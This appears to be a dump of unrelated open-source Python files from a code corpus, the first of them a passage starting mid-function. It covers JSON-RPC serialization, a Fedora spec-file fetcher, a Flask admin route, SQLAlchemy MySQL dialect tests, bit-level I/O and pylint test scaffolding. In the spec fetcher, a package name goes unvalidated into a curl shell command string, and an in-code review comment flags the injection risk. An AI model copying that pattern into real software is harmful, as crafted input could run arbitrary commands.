        valid_params.append(type(None))

    if isinstance(methodname, utils.STRING_TYPES) and not isinstance(
        params, tuple(valid_params)
    ):
        # For a method call, params must be list-ish (or a Fault); error out.
        # (This explanation used to be a stray triple-quoted string evaluated
        # as a no-op expression on every call; it is now a real comment.)
        raise TypeError(
            "Params must be a dict, list, tuple " "or Fault instance."
        )

    # Prepares the JSON-RPC content
    payload = Payload(rpcid=rpcid, version=version)

    if isinstance(params, Fault):
        # Prepare an error dictionary
        # pylint: disable=E1103
        return payload.error(params.faultCode, params.faultString, params.data)

    if not isinstance(methodname, utils.STRING_TYPES) and not is_response:
        # Neither a request nor a response
        raise ValueError(
            "Method name must be a string, or is_response "
            "must be set to True."
        )

    if config.use_jsonclass:
        # Use jsonclass to convert the parameters
        params = jsonclass.dump(params, config=config)

    if is_response:
        # Prepare a response dictionary
        if rpcid is None:
            # A response must have a request ID
            raise ValueError("A method response must have an rpcid.")
        return payload.response(params)

    if is_notify:
        # Prepare a notification dictionary
        return payload.notify(methodname, params)
    else:
        # Prepare a method call dictionary
        return payload.request(methodname, params)
def dumps(
    params=None,
    methodname=None,
    methodresponse=None,
    encoding=None,
    rpcid=None,
    version=None,
    notify=None,
    config=jsonrpclib.config.DEFAULT,
):
    """
    Prepares a JSON-RPC request/response string

    :param params: Method parameters (if a method name is given) or a Fault
    :param methodname: Method name
    :param methodresponse: If True, this is a response dictionary
    :param encoding: Result string encoding
    :param rpcid: Request ID
    :param version: JSON-RPC version
    :param notify: If True, this is a notification request
    :param config: A JSONRPClib Config instance
    :return: A JSON-RPC string
    """
    # Build the JSON-RPC dictionary ...
    payload = dump(
        params, methodname, rpcid, version, methodresponse, notify, config
    )
    # ... then serialize it (defaulting to UTF-8)
    return jdumps(payload, encoding=encoding or "UTF-8")
def load(data, config=jsonrpclib.config.DEFAULT):
    """
    Loads a JSON-RPC request/response dictionary. Calls jsonclass to load beans

    :param data: A JSON-RPC dictionary
    :param config: A JSONRPClib Config instance (or None for default values)
    :return: A parsed dictionary or None
    """
    if data is None:
        # Notification: nothing to convert
        return None

    # If upstream parsing raised, the implementing server code should reply
    # with something like:
    # { 'jsonrpc':'2.0', 'error': fault.error(), id: None }
    if config.use_jsonclass:
        # Re-hydrate serialized beans
        return jsonclass.load(data, config.classes)
    return data
def loads(data, config=jsonrpclib.config.DEFAULT):
    """
    Loads a JSON-RPC request/response string. Calls jsonclass to load beans

    :param data: A JSON-RPC string
    :param config: A JSONRPClib Config instance (or None for default values)
    :return: A parsed dictionary or None
    """
    if data == "":
        # An empty string is a notification
        return None

    # Parse the JSON text, then post-process the beans
    return load(jloads(data), config)
# ------------------------------------------------------------------------------
def check_for_errors(result):
    """
    Checks if a result dictionary signals an error

    :param result: A result dictionary
    :raise TypeError: Invalid parameter
    :raise NotImplementedError: Unknown JSON-RPC version
    :raise ValueError: Invalid dictionary content
    :raise ProtocolError: An error occurred on the server side
    :return: The result parameter
    """
    if not result:
        # Notification
        return result

    if not isinstance(result, utils.DictType):
        # Invalid argument
        raise TypeError("Response is not a dict.")

    if "jsonrpc" in result and float(result["jsonrpc"]) > 2.0:
        # Unknown JSON-RPC version
        raise NotImplementedError("JSON-RPC version not yet supported.")

    if "result" not in result and "error" not in result:
        # Invalid dictionary content
        raise ValueError("Response does not have a result or error key.")

    if "error" in result and result["error"]:
        # Server-side error
        if "code" in result["error"]:
            # Code + Message
            code = result["error"]["code"]
            try:
                # Get the message (jsonrpclib)
                message = result["error"]["message"]
            except KeyError:
                # Get the trace (jabsorb)
                message = result["error"].get("trace", "<no error message>")

            if -32700 <= code <= -32000:
                # Pre-defined errors
                # See http://www.jsonrpc.org/specification#error_object
                raise ProtocolError((code, message))
            else:
                # Application error
                data = result["error"].get("data", None)
                raise AppError((code, message, data))
        elif isinstance(result["error"], dict) and len(result["error"]) == 1:
            # Error with a single entry ('reason', ...): use its content.
            # BUG FIX: dict.keys()[0] raises TypeError on Python 3, where
            # keys() returns a non-indexable view; next(iter(...)) works on
            # both Python 2 and 3.
            error_key = next(iter(result["error"]))
            raise ProtocolError(result["error"][error_key])
        else:
            # Use the raw error content
            raise ProtocolError(result["error"])
    return result
def isbatch(request):
    """
    Tests if the given request is a batch call, i.e. a list of multiple calls

    :param request: a JSON-RPC request object
    :return: True if the request is a batch call
    :raise ProtocolError: The "jsonrpc" member is not a numeric string
    """
    if not isinstance(request, (utils.ListType, utils.TupleType)):
        # Not a list: not a batch call
        return False
    elif len(request) < 1:
        # An empty sequence: not a batch call
        return False
    elif not isinstance(request[0], utils.DictType):
        # One of the requests is not a dictionary, i.e. a JSON Object
        # therefore it is not a valid JSON-RPC request
        return False
    elif "jsonrpc" not in request[0].keys():
        # No "jsonrpc" version in the JSON object: not a request
        return False

    try:
        version = float(request[0]["jsonrpc"])
    except ValueError:
        # Bad version of JSON-RPC
        raise ProtocolError('"jsonrpc" key must be a float(able) value.')

    if version < 2:
        # Batch call were not supported before JSON-RPC 2.0
        return False
    return True
def isnotification(request):
    """
    Tests if the given request is a notification

    :param request: A request dictionary
    :return: True if the request is a notification
    """
    # JSON-RPC 2.0 notifications omit the "id" member entirely;
    # JSON-RPC 1.0 notifications send it as null
    return "id" not in request or request["id"] is None
| pymedusa/Medusa | ext/jsonrpclib/jsonrpc.py | Python | gpl-3.0 | 43,868 | 0.000046 |
# ####################################################################
# gofed - set of tools to automize packaging of golang devel codes
# Copyright (C) 2014 Jan Chaloupka, jchaloup@redhat.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
# ####################################################################
###################################################################
# TODO:
# [ ] - detect more import paths/sources in spec file?
# [ ] - detect from %files every build, analyze its content (downloading it from koji by detecting its name
# from spec file => no koji latest-builds, which packages/builds are no arch, which are arch specific (el6 beast)
# [ ] - all provides of source code import must in a form golang(import_path/...)
# [ ] - what files/provides are optional, which should not be in provides (test files, example, ...)
# [ ] - golang imports of examples are optional
###################################################################
import tempfile
from Utils import runCommand
from SpecParser import SpecParser
from Base import Base
class RemoteSpecParser(Base):
    """Downloads a package's spec file from Fedora's dist-git and parses it."""

    def __init__(self, branch, package):
        """
        :param branch: dist-git branch name (stored; not used by parse())
        :param package: Fedora package name
        """
        Base.__init__(self)
        self.branch = branch
        self.package = package
        self.sp_obj = None

    def parse(self):
        """Fetch the remote spec file and parse it.

        :return: True on success, False on parse failure (the error is then
                 stored on self.err, see Base.getError())
        """
        f = tempfile.NamedTemporaryFile(delete=True)
        # NOTE(review): the package name is interpolated into a shell command
        # string; an unusual/malicious package name could inject shell syntax.
        # Confirm callers validate it, or switch runCommand to an argv list.
        cmd_str = "curl http://pkgs.fedoraproject.org/cgit/rpms/%s.git/plain/%s.spec > %s"
        runCommand(cmd_str % (self.package, self.package, f.name))
        self.sp_obj = SpecParser(f.name)
        if not self.sp_obj.parse():
            self.err = self.sp_obj.getError()
            f.close()
            return False
        f.close()
        return True

    def getProvides(self):
        """Fetch a spec file from pkgdb and get provides from all its [sub]packages"""
        # "is None" instead of "== None" (PEP 8 identity comparison)
        if self.sp_obj is None:
            return {}
        return self.sp_obj.getProvides()

    def getPackageCommits(self):
        """Return the value of the %commit macro, or "" before parse()."""
        if self.sp_obj is None:
            return ""
        return self.sp_obj.getMacro("commit")

    def getPkgURL(self):
        """Return the spec's URL tag, or "" before parse()."""
        if self.sp_obj is None:
            return ""
        return self.sp_obj.getTag("url")
| ingvagabund/gofed | modules/RemoteSpecParser.py | Python | gpl-2.0 | 2,663 | 0.015396 |
#!/usr/bin/env python
#-*-coding:utf-8-*-
#
# @author Meng G.
# 2016-03-28 restructed
from sqip.config import *
from sqip.libs import *
dashboard = Blueprint('dashboard', __name__, template_folder='templates')
@base.route('/admin/login', methods=['GET'])
@union_bug
def admin_login():
    """Render the admin login page."""
    return env.get_template('login.html').render()
@base.route('/admin', methods=['GET'])
@base.route('/admin/<path:path>', methods=['GET'])
@union_bug
def admin(path=None):
    """Render the admin SPA shell for /admin and any admin sub-path.

    :param path: sub-path captured by the catch-all rule; unused here, as
                 routing below /admin is handled client-side
    """
    # BUG FIX: the second rule used "<oath:path>" -- "oath" is not a URL
    # converter (typo for "path"), which fails at registration time -- and
    # the view did not accept the captured "path" argument.
    template = env.get_template('index.html')
    return template.render()
#coding=utf-8
class Quantity:
    """Data descriptor that only accepts values > 0.

    Each descriptor instance manages one attribute, storing its value on the
    owner *instance* under a unique key such as '_Quantity#0'.
    """

    __counter = 0  # class-wide count used to build unique storage names

    def __init__(self):
        cls = self.__class__
        prefix = cls.__name__
        index = cls.__counter
        self.storage_name = '_{}#{}'.format(prefix, index)
        cls.__counter += 1

    def __get__(self, instance, owner):
        # BUG FIX: the descriptor defined __set__ but not __get__, so reading
        # the managed attribute returned the descriptor object itself (the
        # value lives under storage_name, not under the attribute's own name).
        if instance is None:
            # Accessed on the class: return the descriptor itself
            return self
        return instance.__dict__[self.storage_name]

    def __set__(self, instance, value):
        # Parameter renamed from "isinstance", which shadowed the builtin.
        if value > 0:
            instance.__dict__[self.storage_name] = value
        else:
            raise ValueError('value must be > 0')
class LineItem:
    """One order line: a described good with a weight and a unit price."""

    weight = Quantity()  # validated by the descriptor: must be > 0
    price = Quantity()   # validated by the descriptor: must be > 0

    def __init__(self, description, weight, price):
        self.description = description
        self.weight = weight
        self.price = price

    def subtotal(self):
        """Total cost of this line (weight times unit price)."""
        return self.weight * self.price
| wuqize/FluentPython | chapter20/bulkfood/bulkfood_v3.py | Python | lgpl-3.0 | 720 | 0.005556 |
# coding: utf-8
import datetime
from sqlalchemy import bindparam
from sqlalchemy import Column
from sqlalchemy import DateTime
from sqlalchemy import func
from sqlalchemy import Integer
from sqlalchemy import MetaData
from sqlalchemy import Table
from sqlalchemy import testing
from sqlalchemy.dialects import mysql
from sqlalchemy.engine.url import make_url
from sqlalchemy.testing import engines
from sqlalchemy.testing import eq_
from sqlalchemy.testing import expect_warnings
from sqlalchemy.testing import fixtures
from sqlalchemy.testing import mock
from ...engine import test_execute
class DialectTest(fixtures.TestBase):
    # Unit tests for the MySQL dialect: disconnect detection, per-driver
    # connect-argument parsing, and isolation-level handling.
    __backend__ = True
    __only_on__ = "mysql"

    @testing.combinations(
        (None, "cONnection was kILLEd", "InternalError", "pymysql", True),
        (None, "cONnection aLREady closed", "InternalError", "pymysql", True),
        (None, "something broke", "InternalError", "pymysql", False),
        (2006, "foo", "OperationalError", "mysqldb", True),
        (2006, "foo", "OperationalError", "pymysql", True),
        (2007, "foo", "OperationalError", "mysqldb", False),
        (2007, "foo", "OperationalError", "pymysql", False),
    )
    def test_is_disconnect(
        self, arg0, message, exc_cls_name, dialect_name, is_disconnect
    ):
        """The dialect classifies driver exceptions as disconnects (or not)."""

        class Error(Exception):
            pass

        # Fake DBAPI module whose exception hierarchy mirrors the driver's
        dbapi = mock.Mock()
        dbapi.Error = Error
        dbapi.ProgrammingError = type("ProgrammingError", (Error,), {})
        dbapi.OperationalError = type("OperationalError", (Error,), {})
        dbapi.InterfaceError = type("InterfaceError", (Error,), {})
        dbapi.InternalError = type("InternalError", (Error,), {})

        dialect = getattr(mysql, dialect_name).dialect(dbapi=dbapi)

        error = getattr(dbapi, exc_cls_name)(arg0, message)
        eq_(dialect.is_disconnect(error, None, None), is_disconnect)

    def test_ssl_arguments_mysqldb(self):
        from sqlalchemy.dialects.mysql import mysqldb

        dialect = mysqldb.dialect()
        self._test_ssl_arguments(dialect)

    def test_ssl_arguments_oursql(self):
        from sqlalchemy.dialects.mysql import oursql

        dialect = oursql.dialect()
        self._test_ssl_arguments(dialect)

    def _test_ssl_arguments(self, dialect):
        # Shared body: ssl_* query-string entries must be collected into a
        # nested "ssl" dict within the DBAPI connect arguments.
        kwarg = dialect.create_connect_args(
            make_url(
                "mysql://scott:tiger@localhost:3306/test"
                "?ssl_ca=/ca.pem&ssl_cert=/cert.pem&ssl_key=/key.pem"
            )
        )[1]
        # args that differ among mysqldb and oursql
        for k in ("use_unicode", "found_rows", "client_flag"):
            kwarg.pop(k, None)
        eq_(
            kwarg,
            {
                "passwd": "tiger",
                "db": "test",
                "ssl": {
                    "ca": "/ca.pem",
                    "cert": "/cert.pem",
                    "key": "/key.pem",
                },
                "host": "localhost",
                "user": "scott",
                "port": 3306,
            },
        )

    @testing.combinations(
        ("compress", True),
        ("connect_timeout", 30),
        ("read_timeout", 30),
        ("write_timeout", 30),
        ("client_flag", 1234),
        ("local_infile", 1234),
        ("use_unicode", False),
        ("charset", "hello"),
    )
    def test_normal_arguments_mysqldb(self, kwarg, value):
        """Scalar query-string options pass straight through to the DBAPI."""
        from sqlalchemy.dialects.mysql import mysqldb

        dialect = mysqldb.dialect()
        connect_args = dialect.create_connect_args(
            make_url(
                "mysql://scott:tiger@localhost:3306/test"
                "?%s=%s" % (kwarg, value)
            )
        )
        eq_(connect_args[1][kwarg], value)

    def test_mysqlconnector_buffered_arg(self):
        # mysql-connector's "buffered" flag: explicit true/false honored,
        # defaults to True when absent
        from sqlalchemy.dialects.mysql import mysqlconnector

        dialect = mysqlconnector.dialect()
        kw = dialect.create_connect_args(
            make_url("mysql+mysqlconnector://u:p@host/db?buffered=true")
        )[1]
        eq_(kw["buffered"], True)

        kw = dialect.create_connect_args(
            make_url("mysql+mysqlconnector://u:p@host/db?buffered=false")
        )[1]
        eq_(kw["buffered"], False)

        kw = dialect.create_connect_args(
            make_url("mysql+mysqlconnector://u:p@host/db")
        )[1]
        eq_(kw["buffered"], True)

    def test_mysqlconnector_raise_on_warnings_arg(self):
        # "raise_on_warnings": explicit true/false honored, omitted when
        # absent from the URL
        from sqlalchemy.dialects.mysql import mysqlconnector

        dialect = mysqlconnector.dialect()
        kw = dialect.create_connect_args(
            make_url(
                "mysql+mysqlconnector://u:p@host/db?raise_on_warnings=true"
            )
        )[1]
        eq_(kw["raise_on_warnings"], True)

        kw = dialect.create_connect_args(
            make_url(
                "mysql+mysqlconnector://u:p@host/db?raise_on_warnings=false"
            )
        )[1]
        eq_(kw["raise_on_warnings"], False)

        kw = dialect.create_connect_args(
            make_url("mysql+mysqlconnector://u:p@host/db")
        )[1]
        assert "raise_on_warnings" not in kw

    @testing.only_on("mysql")
    def test_random_arg(self):
        """Unknown query-string options are passed through verbatim."""
        dialect = testing.db.dialect
        kw = dialect.create_connect_args(
            make_url("mysql://u:p@host/db?foo=true")
        )[1]
        eq_(kw["foo"], "true")

    @testing.only_on("mysql")
    @testing.skip_if("mysql+mysqlconnector", "totally broken for the moment")
    @testing.fails_on("mysql+oursql", "unsupported")
    def test_special_encodings(self):
        # The dialect must report the charset actually configured on the
        # DBAPI connection
        for enc in ["utf8mb4", "utf8"]:
            eng = engines.testing_engine(
                options={"connect_args": {"charset": enc, "use_unicode": 0}}
            )
            conn = eng.connect()
            eq_(conn.dialect._connection_charset, enc)

    def test_no_show_variables(self):
        # When SHOW VARIABLES is denied, first-connect should warn
        # rather than fail
        from sqlalchemy.testing import mock

        engine = engines.testing_engine()

        def my_execute(self, statement, *args, **kw):
            # Simulate a privilege error by making SHOW VARIABLES
            # return no rows
            if statement.startswith("SHOW VARIABLES"):
                statement = "SELECT 1 FROM DUAL WHERE 1=0"
            return real_exec(self, statement, *args, **kw)

        real_exec = engine._connection_cls.exec_driver_sql
        with mock.patch.object(
            engine._connection_cls, "exec_driver_sql", my_execute
        ):
            with expect_warnings(
                "Could not retrieve SQL_MODE; please ensure the "
                "MySQL user has permissions to SHOW VARIABLES"
            ):
                engine.connect()

    def test_no_default_isolation_level(self):
        # An unreadable isolation level on first connect should warn,
        # not fail
        from sqlalchemy.testing import mock

        engine = engines.testing_engine()

        real_isolation_level = testing.db.dialect.get_isolation_level

        def fake_isolation_level(connection):
            # Replace the connection with one whose cursor returns no rows
            connection = mock.Mock(
                cursor=mock.Mock(
                    return_value=mock.Mock(
                        fetchone=mock.Mock(return_value=None)
                    )
                )
            )
            return real_isolation_level(connection)

        with mock.patch.object(
            engine.dialect, "get_isolation_level", fake_isolation_level
        ):
            with expect_warnings(
                "Could not retrieve transaction isolation level for MySQL "
                "connection."
            ):
                engine.connect()

    def test_autocommit_isolation_level(self):
        # AUTOCOMMIT toggles the server-side @@autocommit flag; switching
        # back to READ COMMITTED clears it
        c = testing.db.connect().execution_options(
            isolation_level="AUTOCOMMIT"
        )
        assert c.exec_driver_sql("SELECT @@autocommit;").scalar()

        c = c.execution_options(isolation_level="READ COMMITTED")
        assert not c.exec_driver_sql("SELECT @@autocommit;").scalar()

    def test_isolation_level(self):
        # Round-trip each standard isolation level through
        # execution_options()
        values = [
            "READ UNCOMMITTED",
            "READ COMMITTED",
            "REPEATABLE READ",
            "SERIALIZABLE",
        ]
        for value in values:
            c = testing.db.connect().execution_options(isolation_level=value)
            eq_(testing.db.dialect.get_isolation_level(c.connection), value)
class ParseVersionTest(fixtures.TestBase):
    # Server version-string parsing, including MariaDB's composite banners.
    @testing.combinations(
        ((10, 2, 7), "10.2.7-MariaDB", (10, 2, 7, "MariaDB"), True),
        (
            (10, 2, 7),
            "5.6.15.10.2.7-MariaDB",
            (5, 6, 15, 10, 2, 7, "MariaDB"),
            True,
        ),
        ((10, 2, 10), "10.2.10-MariaDB", (10, 2, 10, "MariaDB"), True),
        ((5, 7, 20), "5.7.20", (5, 7, 20), False),
        ((5, 6, 15), "5.6.15", (5, 6, 15), False),
        (
            (10, 2, 6),
            "10.2.6.MariaDB.10.2.6+maria~stretch-log",
            (10, 2, 6, "MariaDB", 10, 2, "6+maria~stretch", "log"),
            True,
        ),
        (
            (10, 1, 9),
            "10.1.9-MariaDBV1.0R050D002-20170809-1522",
            (10, 1, 9, "MariaDB", "V1", "0R050D002", 20170809, 1522),
            True,
        ),
    )
    def test_mariadb_normalized_version(
        self, expected, raw_version, version, is_mariadb
    ):
        """Raw banner -> parsed tuple -> normalized (major, minor, patch)."""
        dialect = mysql.dialect()
        eq_(dialect._parse_server_version(raw_version), version)
        dialect.server_version_info = version
        eq_(dialect._mariadb_normalized_version_info, expected)
        assert dialect._is_mariadb is is_mariadb

    @testing.combinations(
        (True, (10, 2, 7, "MariaDB")),
        (True, (5, 6, 15, 10, 2, 7, "MariaDB")),
        (False, (10, 2, 10, "MariaDB")),
        (False, (5, 7, 20)),
        (False, (5, 6, 15)),
        (True, (10, 2, 6, "MariaDB", 10, 2, "6+maria~stretch", "log")),
    )
    def test_mariadb_check_warning(self, expect_, version):
        """MariaDB < 10.2.9 must trigger the CHECK-constraint warning."""
        dialect = mysql.dialect()
        dialect.server_version_info = version
        if expect_:
            with expect_warnings(
                ".*before 10.2.9 has known issues regarding "
                "CHECK constraints"
            ):
                dialect._warn_for_known_db_issues()
        else:
            dialect._warn_for_known_db_issues()
class RemoveUTCTimestampTest(fixtures.TablesTest):
    """This test exists because we removed the MySQL dialect's
    override of the UTC_TIMESTAMP() function, where the commit message
    for this feature stated that "it caused problems with executemany()".

    Since no example was provided, we are trying lots of combinations
    here.

    [ticket:3966]
    """

    __only_on__ = "mysql"
    __backend__ = True

    @classmethod
    def define_tables(cls, metadata):
        # "t": plain datetime column, set explicitly by the statements below
        Table(
            "t",
            metadata,
            Column("id", Integer, primary_key=True),
            Column("x", Integer),
            Column("data", DateTime),
        )
        # "t_default": datetime columns driven by column-level
        # default/onupdate expressions using utc_timestamp()
        Table(
            "t_default",
            metadata,
            Column("id", Integer, primary_key=True),
            Column("x", Integer),
            Column("idata", DateTime, default=func.utc_timestamp()),
            Column("udata", DateTime, onupdate=func.utc_timestamp()),
        )

    def test_insert_executemany(self):
        # utc_timestamp() inline in an executemany INSERT
        with testing.db.connect() as conn:
            conn.execute(
                self.tables.t.insert().values(data=func.utc_timestamp()),
                [{"x": 5}, {"x": 6}, {"x": 7}],
            )

    def test_update_executemany(self):
        # utc_timestamp() inline in an executemany UPDATE
        with testing.db.connect() as conn:
            timestamp = datetime.datetime(2015, 4, 17, 18, 5, 2)
            conn.execute(
                self.tables.t.insert(),
                [
                    {"x": 5, "data": timestamp},
                    {"x": 6, "data": timestamp},
                    {"x": 7, "data": timestamp},
                ],
            )

            conn.execute(
                self.tables.t.update()
                .values(data=func.utc_timestamp())
                .where(self.tables.t.c.x == bindparam("xval")),
                [{"xval": 5}, {"xval": 6}, {"xval": 7}],
            )

    def test_insert_executemany_w_default(self):
        # utc_timestamp() fired via the column-level default
        with testing.db.connect() as conn:
            conn.execute(
                self.tables.t_default.insert(), [{"x": 5}, {"x": 6}, {"x": 7}]
            )

    def test_update_executemany_w_default(self):
        # utc_timestamp() fired via the column-level onupdate
        with testing.db.connect() as conn:
            timestamp = datetime.datetime(2015, 4, 17, 18, 5, 2)
            conn.execute(
                self.tables.t_default.insert(),
                [
                    {"x": 5, "idata": timestamp},
                    {"x": 6, "idata": timestamp},
                    {"x": 7, "idata": timestamp},
                ],
            )

            conn.execute(
                self.tables.t_default.update()
                .values(idata=func.utc_timestamp())
                .where(self.tables.t_default.c.x == bindparam("xval")),
                [{"xval": 5}, {"xval": 6}, {"xval": 7}],
            )
class SQLModeDetectionTest(fixtures.TestBase):
    # Verifies that the dialect inspects the server's sql_mode on connect
    # (backslash escaping, ANSI_QUOTES identifier quoting).
    __only_on__ = "mysql"
    __backend__ = True

    def _options(self, modes):
        # Build an engine whose pool sets the given sql_mode on every connect
        def connect(con, record):
            cursor = con.cursor()
            cursor.execute("set sql_mode='%s'" % (",".join(modes)))

        e = engines.testing_engine(
            options={
                "pool_events": [
                    (connect, "first_connect"),
                    (connect, "connect"),
                ]
            }
        )
        return e

    def test_backslash_escapes(self):
        engine = self._options(["NO_BACKSLASH_ESCAPES"])
        c = engine.connect()
        assert not engine.dialect._backslash_escapes
        c.close()
        engine.dispose()

        # default mode: backslash escapes are enabled
        engine = self._options([])
        c = engine.connect()
        assert engine.dialect._backslash_escapes
        c.close()
        engine.dispose()

    def test_ansi_quotes(self):
        engine = self._options(["ANSI_QUOTES"])
        c = engine.connect()
        assert engine.dialect._server_ansiquotes
        c.close()
        engine.dispose()

    def test_combination(self):
        # both flags detected from a single combined sql_mode value
        engine = self._options(["ANSI_QUOTES,NO_BACKSLASH_ESCAPES"])
        c = engine.connect()
        assert engine.dialect._server_ansiquotes
        assert not engine.dialect._backslash_escapes
        c.close()
        engine.dispose()
class ExecutionTest(fixtures.TestBase):
    """Various MySQL execution special cases."""

    __only_on__ = "mysql"
    __backend__ = True

    def test_charset_caching(self):
        # Reflection must not disturb the cached connection charset
        engine = engines.testing_engine()
        conn = engine.connect()

        metadata = MetaData()
        detected = engine.dialect._detect_charset(conn)
        metadata.reflect(conn)
        eq_(conn.dialect._connection_charset, detected)
        conn.close()

    def test_sysdate(self):
        # SYSDATE() round-trips as a real datetime
        value = testing.db.scalar(func.sysdate())
        assert isinstance(value, datetime.datetime)
class AutocommitTextTest(test_execute.AutocommitTextTest):
    """MySQL-specific keywords that must trigger autocommit detection."""

    __only_on__ = "mysql"

    def test_replace(self):
        self._test_keyword("REPLACE THING")

    def test_load_data(self):
        self._test_keyword("LOAD DATA STUFF")
| graingert/sqlalchemy | test/dialect/mysql/test_dialect.py | Python | mit | 14,932 | 0 |
# @source http://rosettacode.org/wiki/Bitwise_IO#Python
# @license http://www.gnu.org/licenses/fdl-1.2.html
import logging

# Module logger; __name__ resolves to "naabal.util.bitio" when imported
# normally and stays correct if the module is ever moved or renamed
# (previously the dotted path was hard-coded).
logger = logging.getLogger(__name__)
class BitIO(object):
    """Base class for bit-oriented wrappers around a byte stream.

    Keeps one byte of working state (``_bit_buffer``) plus a single-bit
    mask (``_bit_mask``) selecting the current position, most-significant
    bit first.
    """

    BITS_IN_BYTE = 8
    DEFAULT_MASK = 1 << (BITS_IN_BYTE - 1)  # 0x80: the MSB position

    def __init__(self, handle):
        self._data_buffer = handle          # underlying byte stream
        self._bit_buffer = 0x00             # partially assembled byte
        self._bit_mask = self.DEFAULT_MASK  # current bit position
        self._bit_idx = 0                   # whole bytes processed so far

    def __enter__(self):
        return self

    def __exit__(self, type, value, tb):
        pass

    @property
    def index(self):
        """Number of whole bytes read or written so far."""
        return self._bit_idx
class BitWriter(BitIO):
    """Writes individual bits, MSB first, to the wrapped byte stream."""

    def __exit__(self, type, value, tb):
        # Emit any partially filled byte when leaving the context
        self.flush()

    def write_bit(self, bit):
        """Append one bit; any truthy value writes a 1."""
        if bit:
            self._bit_buffer |= self._bit_mask
        self._bit_mask >>= 1
        if not self._bit_mask:
            # A full byte has accumulated: push it out
            self._flush_bit_buffer()
            self._reset_state()

    def write_bits(self, value, bit_count):
        """Append the lowest *bit_count* bits of *value*, MSB first."""
        for shift in range(bit_count - 1, -1, -1):
            if value & (1 << shift):
                self._bit_buffer |= self._bit_mask
            self._bit_mask >>= 1
            if not self._bit_mask:
                self._flush_bit_buffer()
                self._reset_state()

    def flush(self):
        """Write out a pending partial byte; return bytes written so far."""
        if self._bit_mask != self.DEFAULT_MASK:
            self._flush_bit_buffer()
            self._reset_state()
        return self._bit_idx

    def _flush_bit_buffer(self):
        # One completed byte goes to the underlying stream
        self._data_buffer.write(chr(self._bit_buffer))
        self._bit_idx += 1

    def _reset_state(self):
        self._bit_buffer = 0x00
        self._bit_mask = self.DEFAULT_MASK
class BitReader(BitIO):
    """Reads individual bits, MSB first, from the wrapped byte stream."""

    def read_bit(self):
        """Return the next bit as 0 or 1.

        :raise IOError: no more data in the underlying stream
        """
        if self._bit_mask == self.DEFAULT_MASK:
            # Starting a fresh byte: pull it from the stream
            self._load_bit_buffer()
        current = self._bit_buffer & self._bit_mask
        self._bit_mask >>= 1
        if self._bit_mask == 0:
            self._bit_mask = self.DEFAULT_MASK
        return 1 if current else 0

    def read_bits(self, bit_count):
        """Return the next *bit_count* bits as an integer, MSB first."""
        result = 0x00
        for shift in range(bit_count - 1, -1, -1):
            if self._bit_mask == self.DEFAULT_MASK:
                self._load_bit_buffer()
            if self._bit_buffer & self._bit_mask:
                result |= 1 << shift
            self._bit_mask >>= 1
            if self._bit_mask == 0:
                self._bit_mask = self.DEFAULT_MASK
        return result

    def _load_bit_buffer(self):
        c = self._data_buffer.read(1)
        if c:
            self._bit_buffer = ord(c)
            self._bit_idx += 1
        else:
            raise IOError('Attempted to read past EOF')
| aheadley/python-naabal | naabal/util/bitio.py | Python | mit | 2,763 | 0.002533 |
# Copyright (c) 2003-2008 LOGILAB S.A. (Paris, FRANCE).
# http://www.logilab.fr/ -- mailto:contact@logilab.fr
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation; either version 2 of the License, or (at your option) any later
# version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
"""functional/non regression tests for pylint"""
import unittest
import sys
import re
import new
from os import linesep
from os.path import exists
from logilab.common import testlib
from utils import get_tests_info, fix_path, TestReporter
from logilab.astng import MANAGER
from pylint.lint import PyLinter
from pylint import checkers
# Shared single PyLinter instance used by every generated test, wired to a
# TestReporter that records the message ids it emits.
test_reporter = TestReporter()
linter = PyLinter()
linter.set_reporter(test_reporter)
linter.config.persistent = 0
checkers.initialize(linter)
linter.global_set_option('required-attributes', ('__revision__',))

# Interpreter capability flags, used to select version-specific fixtures
PY23 = sys.version_info >= (2, 3)
PY24 = sys.version_info >= (2, 4)
PY25 = sys.version_info >= (2, 5)

if linesep != '\n':
    LINE_RGX = re.compile(linesep)
    def ulines(string):
        # normalize platform line endings to '\n'
        return LINE_RGX.sub('\n', string)
else:
    def ulines(string):
        # output already uses '\n': nothing to do
        return string

# Matches "informational" input modules (func_iNNNN), for which the 'I'
# message category is enabled
INFO_TEST_RGX = re.compile('^func_i\d\d\d\d$')
def exception_str(ex):
    """Replacement __str__ for exception instances: show file and args."""
    return 'in {0}\n:: {1}'.format(ex.file, ', '.join(ex.args))
class LintTestUsingModule(testlib.TestCase):
    # Functional test: run pylint over an input module (dotted name) and
    # compare the reporter output with the recorded expected-messages file.
    DEFAULT_PACKAGE = 'input'
    package = DEFAULT_PACKAGE
    linter = linter
    module = None
    depends = None
    _TEST_TYPE = 'module'

    def shortDescription(self):
        # Human-readable test title shown by the test runner
        values = { 'mode' : self._TEST_TYPE,
                   'input': self.module,
                   'pkg': self.package,
                   'cls': self.__class__.__name__}

        if self.package == self.DEFAULT_PACKAGE:
            msg = '%(mode)s test of input file "%(input)s" (%(cls)s)'
        else:
            msg = '%(mode)s test of input file "%(input)s" in "%(pkg)s" (%(cls)s)'
        return msg % values

    def test_functionality(self):
        # Check the module plus any dependency modules in a single run
        tocheck = [self.package+'.'+self.module]
        if self.depends:
            tocheck += [self.package+'.%s' % name.replace('.py', '')
                        for name, file in self.depends]
        self._test(tocheck)

    def _test(self, tocheck):
        # 'I' (informational) messages are only enabled for func_iNNNN inputs
        if INFO_TEST_RGX.match(self.module):
            self.linter.enable_message_category('I')
        else:
            self.linter.disable_message_category('I')
        try:
            self.linter.check(tocheck)
        except Exception, ex:
            # need finalization to restore a correct state
            self.linter.reporter.finalize()
            ex.file = tocheck
            ex.__str__ = new.instancemethod(exception_str, ex, None)
            raise
